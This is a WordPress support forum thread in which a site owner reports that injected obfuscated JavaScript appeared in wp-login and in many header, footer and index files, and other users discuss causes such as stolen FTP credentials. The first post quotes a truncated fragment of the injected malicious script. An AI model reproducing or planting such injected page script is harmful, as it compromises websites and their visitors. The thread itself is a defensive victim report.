Support » Fixing WordPress » 2.5.1 hacked?

  • Looks like at around 8:48AM this morning, someone got into my WordPress installs (all 11 of them, in my account), and managed to add code to wp-login:

    script language=JavaScript>function hmlyban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,52,34,14,32,57,59,46,0,

    Anyone know of any vulnerabilities? My directories were changed to 715 (I think my host did that) this morning, as well.

    Anyone know what’s going on? I deleted the code, and uploaded a clean copy, and am checking the rest of my directories for stuff changed this morning, as well.

Viewing 3 replies - 1 through 3 (of 3 total)
  • They managed to hit files that weren’t 775 or 777, mostly every header, footer, and index file in every directory in every domain.

    My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

    Switch hosts.

    I’ve seen almost exactly the same JS code inserted into HTML and PHP files for WP and non-WP sites. We are pretty sure ours was the result of a compromised client computer with cached FTP usernames and passwords.

    For each FTP account that was compromised the function name, the string passed to it, and the numeric array were different. In our case, they inserted the script at the opening and closing body tags of any documents that contained them.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘2.5.1 hacked?’ is closed to new replies.